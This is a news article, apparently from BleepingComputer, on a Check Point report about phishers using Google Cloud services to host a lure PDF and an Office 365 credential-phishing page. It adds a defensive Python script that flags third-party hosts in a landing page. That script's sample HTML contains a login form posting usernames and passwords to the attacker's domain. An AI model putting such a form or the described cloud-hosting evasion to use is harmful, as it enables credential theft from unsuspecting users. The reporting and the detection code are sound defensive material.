Fraudsters looking to collect login details are increasingly turning to public cloud services to host lure documents and phishing pages, making it more difficult for targets to detect the attack.
The trend has gained traction among cybercriminals, who rely on multiple cloud services to host phishing landing pages and the lure documents redirecting to them.
In a campaign this year, fraudsters set up a clever scenario that involves multiple legitimate elements to hide the theft of Office 365 credentials.
Researchers at Check Point describe in a report today that the attackers relied on Google Drive to host a malicious PDF document and Google’s “storage.googleapis[.]com” to host the phishing page.
Google’s cloud services are not the only ones abused this way. BleepingComputer analyzed a recent phishing campaign that used Microsoft Azure, Microsoft Dynamics, and IBM Cloud.
The PDF spotted by Check Point was made to look like a gateway to content available through the SharePoint web-based collaboration platform.
Once the potential victim takes the bait and follows the Access Document link, the phishing page hosted on Google Cloud Platform loads and asks the user to log in with Office 365 credentials or an organization ID.
Regardless of the selected option, an Outlook login pop-up window launches to complete the alleged login process and provide access to the requested document.
Check Point highlights that victims are unlikely to spot the scam since the pages load from legitimate sources and at the end of the process a genuine PDF document from a reputable company is delivered.
Looking at the source code, though, reveals that the resources for the landing pages are loaded from a third-party location, “prvtsmtp[.]com.”
While this trick still leaves the door open for detection, a newer one observed in recent attacks may leave victims with no visible sign of the phishing attack.
According to the researchers, attackers started using Google’s Cloud Functions service, which allows running code in the cloud. This tactic lets them load the resources for the phishing page without revealing the attacker’s own domain.
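The source-code check described in the two paragraphs above, as an added example that is not part of the Check Point report or this article: it lists the hosts a fetched landing page loads resources from or submits forms to, other than the host serving the page. The sample HTML is constructed, modelled on the first-stage page (served from storage.googleapis.com, pulling a script and posting the form to prvtsmtp.com, written here without the defanging brackets so it parses). The second sample shows the limitation of the check: when every resource comes from the same cloud origin, as with the Cloud Functions variant, nothing is flagged.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Attributes whose values point at resources or form targets.
RESOURCE_ATTRS = {"src", "href", "action", "data"}


class _ResourceCollector(HTMLParser):
    """Collect every src/href/action/data value in the page."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in RESOURCE_ATTRS and value:
                self.urls.append(value)


def third_party_hosts(page_url, html):
    """Return the set of hostnames, other than the page's own host, that
    the page pulls resources from or submits forms to."""
    parser = _ResourceCollector()
    parser.feed(html)
    own_host = urlparse(page_url).hostname
    hosts = set()
    for raw in parser.urls:
        # Relative references resolve to the serving host and are skipped.
        host = urlparse(urljoin(page_url, raw)).hostname
        if host and host != own_host:
            hosts.add(host)
    return hosts


# Constructed sample: page on Google Cloud Storage, resources elsewhere.
SAMPLE_PAGE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """
<html><head><link rel="stylesheet" href="style.css">
<script src="https://prvtsmtp.com/js/login.js"></script></head>
<body><form action="https://prvtsmtp.com/post.php" method="post">
<input name="user"><input name="pass" type="password"></form></body></html>
"""

# Constructed sample: everything served from the same cloud origin, so the
# check has nothing to report (the Cloud Functions case described above).
SAME_ORIGIN_HTML = '<script src="/js/login.js"></script><form action="/post">'

if __name__ == "__main__":
    print(third_party_hosts(SAMPLE_PAGE_URL, SAMPLE_HTML))       # {'prvtsmtp.com'}
    print(third_party_hosts(SAMPLE_PAGE_URL, SAME_ORIGIN_HTML))  # set()
```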
“Investigating prvtsmtp[.]com showed that it resolved to a Ukrainian IP address (31.28.168[.]4). Many other domains related to this phishing attack resolved to the same IP address, or different ones on the same netblock” - Check Point
This detail allowed researchers to trace this particular attacker’s activity back to 2018, when they hosted the phishing pages directly on a malicious website. Next, they switched to Azure Storage before moving to Google Cloud.
The attacker’s project hosting the malicious files is no longer active. Google suspended it back in January and the URL died with it. “Google investigates and suspends phishing pages when we become aware of them through Safe Browsing data feeds and other direct reports.”